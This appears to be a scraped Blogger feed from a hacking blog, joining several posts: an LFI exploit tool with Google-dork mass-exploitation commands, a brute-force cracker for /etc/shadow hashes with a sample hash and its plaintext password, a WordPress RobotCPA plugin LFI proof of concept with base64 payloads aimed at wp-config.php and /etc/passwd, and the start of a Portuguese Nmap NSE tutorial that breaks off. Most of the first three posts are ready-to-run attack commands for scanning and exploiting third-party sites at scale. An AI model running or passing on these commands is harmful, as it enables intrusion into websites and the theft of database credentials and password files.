<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>Vulnerability Description</b></span><br />
<br />
Local File Inclusion (also known as LFI) is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected. Although most examples point to vulnerable PHP scripts,we should keep in mind that it is also common in other technologies such as JSP, ASP and others.<br />
<br />
In successful cases If the above mentioned conditions are met, an attacker would see something like the following:<br />
<br />
root:x:0:0:root:/root:/bin/bash<br />
bin:x:1:1:bin:/bin:/sbin/nologin<br />
daemon:x:2:2:daemon:/sbin:/sbin/nologin<br />
alex:x:500:500:alex:/home/alex:/bin/bash<br />
margo:x:501:501::/home/margo:/bin/bash<br />
<br />
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Download tool lfiINURL</span></b><br />
<a href="https://github.com/googleinurl/lfiINURL">https://github.com/googleinurl/lfiINURL</a><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>COMMAND EXPLOIT --help</b></span><br />
<br />
<span style="color: red; font-family: "arial" , "helvetica" , sans-serif;"> <b>-t</b> : SET TARGET.</span><br />
<span style="color: red; font-family: "arial" , "helvetica" , sans-serif;"> <b>-c</b> : COUNT DIR.</span><br />
<span style="color: red; font-family: "arial" , "helvetica" , sans-serif;"> ex: -c 3 = /etc/passwd, ../etc/passwd, ../../etc/passwd ...</span><br />
<b>Execute:</b><br />
<span style="color: red; font-family: "courier new" , "courier" , monospace;">php lfiINURL.php <b>-t</b> target.br/index.file?= <b>-c</b> 50</span><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>Demonstration execution</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://camo.githubusercontent.com/30deb4425b8f126db77d10d127f0ea7c79bd8441/687474703a2f2f692e696d6775722e636f6d2f346170464d6d5a2e706e67" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Demonstration execution" border="0" height="308" src="https://camo.githubusercontent.com/30deb4425b8f126db77d10d127f0ea7c79bd8441/687474703a2f2f692e696d6775722e636f6d2f346170464d6d5a2e706e67" title="Demonstration execution" width="640" /></a></div>
<br />
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;">USE SCANNER INURLBR MASS EXPLOIT COMMAND EXEMPLE</span></b><br />
Download scanner inurlbr 1.0<br />
<a href="https://github.com/googleinurl/SCANNER-INURLBR" target="_blank">https://github.com/googleinurl/SCANNER-INURLBR</a><br />
<br />
<span style="color: red; font-family: "courier new" , "courier" , monospace;">inurlbr.php --dork 'br+index.p=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&index.p=" && <i>php lfiINURL.php <b>-t</b> $URL <b>-c</b> 10</i>'</span><br />
<span style="color: red; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="color: red; font-family: "courier new" , "courier" , monospace;">inurlbr.php --dork 'include=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&include=" && <i>php lfiINURL.php <b>-t</b> $URL <b>-c</b> 10</i>'</span><br />
<span style="color: red; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="color: red; font-family: "courier new" , "courier" , monospace;">inurlbr.php --dork 'cn+page=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&page=" && <i>php lfiINURL.php <b>-t</b> $URL <b>-c</b> 10</i>'</span><br />
<span style="color: red; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="color: red; font-family: "courier new" , "courier" , monospace;">inurlbr.php --dork 'cn+page=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&page=" && <i>php lfiINURL.php <b>-t</b> $URL <b>-c</b> 10</i>'</span><br />
<br />
<b># OBS USE UNIX</b><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>Demonstration execution xpl + inurlbr</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://camo.githubusercontent.com/787928ce51a630e950800d83e375b1479fb22e5f/687474703a2f2f692e696d6775722e636f6d2f37495a744d364a2e6a7067" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Demonstration execution xpl + inurlbr" border="0" height="306" src="https://camo.githubusercontent.com/787928ce51a630e950800d83e375b1479fb22e5f/687474703a2f2f692e696d6775722e636f6d2f37495a744d364a2e6a7067" title="Demonstration execution xpl + inurlbr" width="640" /></a></div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b><br /></b></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b><br /></b></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>References</b></span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">[1] <a href="https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion" target="_blank">https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion</a></span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">[2] <a href="http://www.wikipedia.org/wiki/Local_File_Inclusion" target="_blank">http://www.wikipedia.org/wiki/Local_File_Inclusion</a></span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">[3] <a href="https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo" target="_blank">https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo</a></span>InurlBRhttp://www.blogger.com/profile/12688503833321390298noreply@blogger.com0tag:blogger.com,1999:blog-5670232360751087799.post-81946415124022075232015-07-03T17:12:00.001-03:002015-07-03T17:12:06.122-03:00Jameh - Brute Force Hash passwords /etc/shadow<h4 style="clear: both; text-align: center;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><span style="text-align: start;">Jameh - </span>Brute Force</span></h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP4Iq4pMn-pumNT9XmrKuG_OX4yGi41yn0smR2m8q_YUO5vMbEetqNmINb68l4Ur1m1LmNaQa0GoYcvqNlmC5cov4Yw7Wd_3dAdhpnkceIw5Gm5vyq3uM1wNIMr8uqSbcl646ZlUG6nEef/s1600/Captura+de+tela+de+2015-07-03+17%253A10%253A10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Jameh, who actually writes and reads 'Jame' which is the Tupi Guarani means hidden, mysterious, aims to conduct a brute-force hashed passwords contained in the / etc / shadow, passing the salt and hash of the encrypted password he tries to break through the dictionary password. Jameh was inspired by the tool made by Ricardo Longatto done in C loncrack to perform a brute-force passwords in hash staying in the / etc / shadow." border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP4Iq4pMn-pumNT9XmrKuG_OX4yGi41yn0smR2m8q_YUO5vMbEetqNmINb68l4Ur1m1LmNaQa0GoYcvqNlmC5cov4Yw7Wd_3dAdhpnkceIw5Gm5vyq3uM1wNIMr8uqSbcl646ZlUG6nEef/s640/Captura+de+tela+de+2015-07-03+17%253A10%253A10.png" title="Jameh, who actually writes and reads 'Jame' which is the Tupi Guarani means hidden, mysterious, aims to conduct a brute-force hashed passwords contained in the / etc / shadow, passing the salt and hash of the encrypted password he tries to break through the dictionary password. Jameh was inspired by the tool made by Ricardo Longatto done in C loncrack to perform a brute-force passwords in hash staying in the / etc / shadow." width="640" /></a></div>
<br />
Jameh, who actually writes and reads 'Jame' which is the Tupi Guarani means hidden, mysterious, aims to conduct a brute-force hashed passwords contained in the /etc /shadow, passing the salt and hash of the encrypted password he tries to break through the dictionary password.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Creator</b></span><br />
<i>Danilo Vaz - UNK</i><br />
danilovazb@gmail.com<br />
<a href="http://unk-br.blogspot.com/">http://unk-br.blogspot.com</a><br />
<a href="https://twitter.com/unknownantisec">https://twitter.com/unknownantisec</a><br />
<a href="http://github.com/danilovazb">http://github.com/danilovazb</a><br />
<br />
<i>Jameh was inspired by the tool made by Ricardo Longatto done in C <a href="https://github.com/ricardolongatto/loncrack" target="_blank">loncrack</a> to perform a brute-force passwords in hash staying in the /etc/shadow.</i><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>REQUERIMENTS</b></span><br />
<br />
Import:<br />
threading<br />
time<br />
crypt<br />
argparse<br />
sys<br />
subprocess<br />
<br />
permission Reading & Writing<br />
User root privilege, or is in the sudoers group<br />
Operating system LINUX<br />
Python 2.7<br />
<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>INSTALL</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">git clone <a href="http://github.com/danilovazb/jameh">http://github.com/danilovazb/jameh</a></span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>HELP</b></span><br />
usage:<br />
<span style="color: red; font-family: Courier New, Courier, monospace;">jameh.py [-h] [-t 10] -f word_list.txt -s '$6$DgAOLzvU' -ha '$xw5oqFEZw30SSCdgD9KOiK2BG1J.O135BowUgdsUZB3ErEeZii6s1vC07BcBoPY06iNcJpxhQYTwzBpjVj7oq.'</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>optional arguments:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> -h, --help show this help message and exit</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> -t 10, --threads 10</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> Threads</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> -f word_list.txt, --file word_list.txt</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> Opens file with passwords</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> -s '$6$DgAOLzvU', --salt '$6$DgAOLzvU'</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> Salt, '$6$DgAOLzvU'</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> -ha '$xw5oqFEZw30SSCdgD9KOiK2BG1J.O135BowUgdsUZB3ErEeZii6s1vC07BcBoPY06iNcJpxhQYTwzBpjVj7oq.', --hash '$xw5oqFEZw30SSCdgD9KOiK2BG1J.O135BowUgdsUZB3ErEeZii6s1vC07BcBoPY06iNcJpxhQYTwzBpjVj7oq.'</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> hash, '$xw5oqFEZw30SSCdgD9KOiK2BG1J.O135BowUgdsUZB3ErEeZii</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> 6s1vC07BcBoPY06iNcJpxhQYTwzBpjVj7oq.'</span><br />
<div>
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>EXAMPLE:</b></span></div>
<div>
<div>
Password: <b>s3nh42015!@#</b></div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">~# cat /etc/shadow</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">root:!:16440:0:99999:7:::</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">daemon:*:16273:0:99999:7:::</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">bin:*:16273:0:99999:7:::</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">sys:*:16273:0:99999:7:::</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">sync:*:16273:0:99999:7:::</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">pulse:*:16273:0:99999:7:::</span></div>
<div>
<i><b><span style="font-family: Courier New, Courier, monospace;">danilo:$6$DgAOLzvU$Mt0WllW7AFJt5eFk0HPzjQNes/vvPkHaVmPIaWEb7K64uayPJ3CrEW8gjlBinh9Dzqj4RZXfRAN45XxrpWYjX.:16440:0:99999:7:::</span></b></i></div>
<div>
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>COMMAND:</b></span></div>
<div>
~# python <span style="color: red; font-family: Courier New, Courier, monospace;">jameh.py <b>--file</b> wl.txt <b>--threads</b> 10 <b>--salt</b> '$6$DgAOLzvU' <b>--hash </b>'$Mt0WllW7AFJt5eFk0HPzjQNes/vvPkHaVmPIaWEb7K64uayPJ3CrEW8gjlBinh9Dzqj4RZXfRAN45XxrpWYjX.'</span></div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Ref:</div>
<div>
<a href="http://unk-br.blogspot.com.br/2015/06/jameh-brute-force-em-hash-de-senhas.html" target="_blank">http://unk-br.blogspot.com.br/2015/06/jameh-brute-force-em-hash-de-senhas.html</a></div>
InurlBRhttp://www.blogger.com/profile/12688503833321390298noreply@blogger.com0tag:blogger.com,1999:blog-5670232360751087799.post-27082564750233680552015-06-24T00:42:00.002-03:002015-06-24T01:01:16.029-03:00WordPress RobotCPA Plugin V5 - Local File Inclusion - MASS EXPLOIT INURLBR<h3 style="text-align: center;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Exploring theme Plugin RobotCPA V5 CMS wordpress</span></h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAwv7ZrZQD6u-OfG-T3c76Q3ILaG5h7oaU9UCHqTD7EMFTlFaSYp0_EMVFPAs55KxnvGJlCC4SqCHIl_Au7n0CqI1HvDbFpYt1t1vgOsDNMx_1T5kYG8sSBGcAdd3CJAkm1GWqhHBV5Vsc/s1600/WordPress-Vulnerability.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include Exploit Author: T3N38R15 Vendor Homepage: http://robot-cpa.good-info.co/ Version: 5V Tested on: Windows (Firefox) / Linux (Firefox) Acess: https://www.exploit-db.com/exploits/37252/ The affected file is f.php and the get-parameter "l" is vulnerable to local file inclusion. We just need to base64 encode our injection." border="0" height="339" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAwv7ZrZQD6u-OfG-T3c76Q3ILaG5h7oaU9UCHqTD7EMFTlFaSYp0_EMVFPAs55KxnvGJlCC4SqCHIl_Au7n0CqI1HvDbFpYt1t1vgOsDNMx_1T5kYG8sSBGcAdd3CJAkm1GWqhHBV5Vsc/s640/WordPress-Vulnerability.jpg" title="Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include Exploit Author: T3N38R15 Vendor Homepage: http://robot-cpa.good-info.co/ Version: 5V Tested on: Windows (Firefox) / Linux (Firefox) Acess: https://www.exploit-db.com/exploits/37252/ The affected file is f.php and the get-parameter "l" is vulnerable to local file inclusion. We just need to base64 encode our injection." width="640" /></a></div>
<span style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include</span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Exploit Author: <b>T3N38R15</b></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Vendor Homepage: <a href="http://robot-cpa.good-info.co/">http://robot-cpa.good-info.co/</a></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Version: 5V</span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Tested on: Windows (Firefox) / Linux (Firefox)<br />Acess:<a href="https://www.exploit-db.com/exploits/37252/"> https://www.exploit-db.com/exploits/37252/</a></span><br />
<br />
<i>The affected file is<b><span style="font-family: Courier New, Courier, monospace;"> <span style="color: red;">f.php</span></span></b> and the get-parameter <span style="font-family: Courier New, Courier, monospace;">"<b><span style="color: red;">l</span></b>"</span> is vulnerable to local file inclusion.</i><br />
<i>We just need to <b><span style="color: red;">base64</span></b> encode our injection.</i><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>POC:</b></span><br />
<br />
<b>string exploit: </b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">php://filter/resource=./../../../wp-config.php</span><br />
<b>base64: </b><span style="color: red; font-family: Courier New, Courier, monospace;">cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==</span><br />
<br />
<b>string exploit: </b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">file:///etc/passwd</span><br />
<b>base64: </b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">ZmlsZTovLy9ldGMvcGFzc3dk</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Exemple Injetion:</b></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">http://domain.com/wp-content/plugins/robotcpa/f.php?l=</span><b><span style="color: red; font-family: Courier New, Courier, monospace;">{STRING_BASE64_XPL}</span></b><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Mass exploitation with inurlbr</b></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">using get exploration parameters and scanner internal encoder</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Exemple:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="color: red;"><b><span style="font-size: large;">--exploit-get</span></b> {you_get}</span><br /><span style="color: red;"><b>--exploit-get</b> "&index.php?id=10'´0x27"</span></span><br />
<br />
<b><span style="color: red; font-family: Courier New, Courier, monospace; font-size: large;">base64</span></b> <span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Encrypt values in base64.</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Example: <span style="color: red;"><b>base64(</b>{value}<b>)</b></span></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>base64(</b><i>102030</i><b>)</b></span></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>--exploit-get</b> '<i>user?id=</i><b>base64(</b><i>102030</i><b>)</b>'</span></span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Let's use:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="color: red;"><b>--exploit-get</b> </span>"<i><span style="color: yellow;">&l=</span></i><b><span style="color: red;">base64(</span></b><i><span style="color: yellow;">file:///etc/passwd</span></i><b><span style="color: red;">)</span></b>"</span><br />
or<br />
<span style="color: red; font-family: 'Courier New', Courier, monospace;"><b>--exploit-get</b> </span><span style="font-family: 'Courier New', Courier, monospace;">"</span><i style="font-family: 'Courier New', Courier, monospace;"><span style="color: yellow;">&l=</span></i><b style="font-family: 'Courier New', Courier, monospace;"><span style="color: red;">base64(</span></b><span style="color: yellow; font-family: Courier New, Courier, monospace;"><i>php://filter/resource=./../../../wp-config.php</i></span><span style="color: red; font-family: 'Courier New', Courier, monospace;"><b>)</b></span><span style="font-family: 'Courier New', Courier, monospace;">"</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Dork:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">inurl:"/wp-content/plugins/robotcpa/"</span><br />
<span style="font-family: Courier New, Courier, monospace;">inurl:"plugins/robotcpa/f.php?l="</span><br />
<span style="background-color: white; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; line-height: 15.3999996185303px; white-space: pre;"><br /></span>
<b style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; font-size: x-large;">Complete command</b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">php inurlbr.php <b>--dork</b> 'inurl:"plugins/robotcpa/f.php?l="' <b>--exploit-get</b> "&l=<b>base64(</b><i>file:///etc/passwd</i><b>)</b>" <b>-s</b> vuln.txt <b>-q</b> 1,2,3,64</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="font-size: large;"><b>Internal validation script inurlbr</b></span></span><br />
<br />
<span style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">Exploring the server password file...</span><br />
<span style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">LOCAL FILE INCLUSION</span><br />
<i><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Local File Inclusion (also known as LFI) is the process of including </span><span style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;"> files, that are already locally present on the server, through the </span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"> exploiting of vulnerable inclusion procedures implemented in the </span></i><span style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;"><i> application.</i> </span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><a href="https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion">https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion</a></span><br />
<span style="font-family: Courier New, Courier, monospace;">$validation['LOCAL-FILE-INCLUSION-01'] = '/root:/';</span><br />
<span style="font-family: Courier New, Courier, monospace;">$validation['LOCAL-FILE-INCLUSION-02'] = 'root:x:0:0:';</span><br />
<span style="font-family: Courier New, Courier, monospace;">$validation['LOCAL-FILE-INCLUSION-03'] = 'mysql:x:';</span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Finding any of these values the script alert as vulnerable.</b></span><br />
<span style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">Exploring the server wp-config.php file...</span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">CMS WORDPRESS</span><br />
<i><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">As the name suggests, if the web application doesn’t check the file </span><span style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">name required by the user, any malicious user can exploit this </span><span style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">vulnerability to download sensitive files from the server.</span></i><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><i>Arbitrary File Download vulnerability file wp-config.php</i></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271</a></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><a href="http://www.acunetix.com/vulnerabilities/web/wordpress-plugin-slider-revolution-arbitrary-file-disclosure">http://www.acunetix.com/vulnerabilities/web/wordpress-plugin-slider-revolution-arbitrary-file-disclosure</a></span><br />
<span style="font-family: Courier New, Courier, monospace;">$validation['CMS-WORDPRESS-01'] = "define('DB_NAME'";</span><br />
<span style="font-family: Courier New, Courier, monospace;">$validation['CMS-WORDPRESS-02'] = "define('DB_USER'";</span><br />
<span style="font-family: Courier New, Courier, monospace;">$validation['CMS-WORDPRESS-03'] = "define('DB_PASSWORD'";</span><br />
<span style="font-family: Courier New, Courier, monospace;">$validation['CMS-WORDPRESS-04'] = "define('DB_HOST'";</span><br />
<b style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">Finding any of these values the script alert as vulnerable.</b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>OUTPUT: </b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZsf9-WgPXfGwqgd3_zuV1oqHchHnmGoyAH8c-jPHg8MykY8U1HsSumcM7MTSkKDMQHHPxLMooiXKVaMi2Rag1tT8xyRWGWnMOvyPTkABAhCnuAtGchQ_Dhf5H3FBuq1UBsFMlXR3bR_iU/s1600/Captura+de+tela+de+2015-06-23+13%253A47%253A40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZsf9-WgPXfGwqgd3_zuV1oqHchHnmGoyAH8c-jPHg8MykY8U1HsSumcM7MTSkKDMQHHPxLMooiXKVaMi2Rag1tT8xyRWGWnMOvyPTkABAhCnuAtGchQ_Dhf5H3FBuq1UBsFMlXR3bR_iU/s640/Captura+de+tela+de+2015-06-23+13%253A47%253A40.png" width="640" /></a></div>
<br />
<span style="font-size: large;"><span style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;"><b>Download:</b></span></span><br />
<span style="font-size: large;"><a href="http://github.com/googleinurl/SCANNER-INURLBR" style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">http://github.com/googleinurl/SCANNER-INURLBR</a></span>InurlBRhttp://www.blogger.com/profile/12688503833321390298noreply@blogger.com0tag:blogger.com,1999:blog-5670232360751087799.post-2449800045872842052015-06-20T21:24:00.000-03:002015-07-08T15:28:00.224-03:00Nmap Scripting Engine (NSE) - Escrevendo o meu primeiro script<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrkjG_w0CBS7eP1ausQTEP3PIxuG4x1jCaVhiz_clewBVo666p2NqRsy8qBBN-yTofjpnfEig_fB6a5V76alfOkkTPb7VWIzhBPpqGnlix6L-ZD-vovCmkA9pGjoi-ngKgq60yIKu3908/s1600/banner.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrkjG_w0CBS7eP1ausQTEP3PIxuG4x1jCaVhiz_clewBVo666p2NqRsy8qBBN-yTofjpnfEig_fB6a5V76alfOkkTPb7VWIzhBPpqGnlix6L-ZD-vovCmkA9pGjoi-ngKgq60yIKu3908/s640/banner.png" width="640" /></a></div>
<br />
<h2>
<center>
<span style="color: red;">
Introdução</span></center>
</h2>
<br />
O Nmap Scripting Engine (NSE) é um dos recursos mais poderosos e flexíveis do Nmap. Ele permite aos usuários escrever (e partilhar) scripts simples para automatizar uma ampla variedade de tarefas de rede. Esses scripts são executados em paralelo com a velocidade e eficiência que se espera do Nmap. Os usuários podem contar com a crescente e diversificada base de dados de scripts distribuídos com o Nmap, ou escrever o seu próprio para atender às necessidades personalizadas, os scripts Nmap Scripting Engine são implementados usando linguagem de programação Lua, Nmap API e um número de realmente poderosas Bibliotecas NSE.<br />
<span style="color: red;">LUA: <a href="http://www.dev-hq.net/lua/" target="_blank">Lua Tutorials - www.dev-hq.net</a> NMAP API: <a href="http://nmap.org/book/nse-api.html" target="_blank">Nmap API</a> NSEDOC: <a href="https://nmap.org/nsedoc/" target="_blank">nsedoc (nse)</a></span><br />
<br />
<br />
<b>Os scripts NSE são (pack) em diferentes categorias</b>:<br />
auth, broadcast, brute, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe,vuln<br />
configuando o nosso script NSE dentro de uma destas categorias permite-nos chama-lo a ele e todos<br />
os scripts dentro dessa mesma categoria usando a 'flag' (--script <categoria> <target>). o seguinte<br />
exemplo "irá correr o nosso script e todos que se encontrarem dentro da categoria 'discovery'"<br />
<span style="color: red;">exemplo:</span> nmap -sS -Pn -p 80 --script discovery <target><br />
<br />
<b><br /></b>
<b>Os scripts NSE são divididos em 4 secções</b>:<br />
O '<span style="color: red;">HEAD'</span> contém meta-dados que descreve a funcionalidade do modulo, autor, impacto, categoria e outros dados descritivos.<br />
As <span style="color: red;">'DEPENDENCIES'</span> (bibliotecas lua necessarias) ao uso da API de programação do nmap<br />
A <span style="color: red;">'RULE SECTION'</span> define as condições necessárias para o script executar. Esta secção deve conter pelo menos uma função desta lista: portrule, hostrule, prerule, postrule. Para os fins deste tutorial (e a maioria dos scripts), vou concentrar-se no portrule que pode executar verificações sobre ambas as propriedades de host e porta antes de correr o script. No script abaixo, portrule se aproveita da API do nmap para verificar se há alguma porta http aberta para executar os commands da secção 'the action section'.<br />
A <span style="color: red;">'ACTION SECTION'</span> define a lógica do script, Na tradição de K&R (kernighan & ritchie) eu vou simplesmente dar a saída "Olá, mundo!" para qualquer porta aberta http usando a API 'return' para fazer o output.<br />
<br />
<br />
<br />
<span style="color: red; font-size: large;"></span><br />
<h2>
<center>
<span style="color: red; font-size: large;"><b>hello.nse</b></span></center>
</h2>
Vamos começar com um script que simplesmente irá imprimir "hello world" para todas as portas HTTP encontradas abertas.<br />
Abra um editor de texto e escreva o seguinte trecho em 'hello.nse' em seu diretório home.<br />
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px;">
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">------------------------------ The Head Section ------------------------------</span></div>
</li>
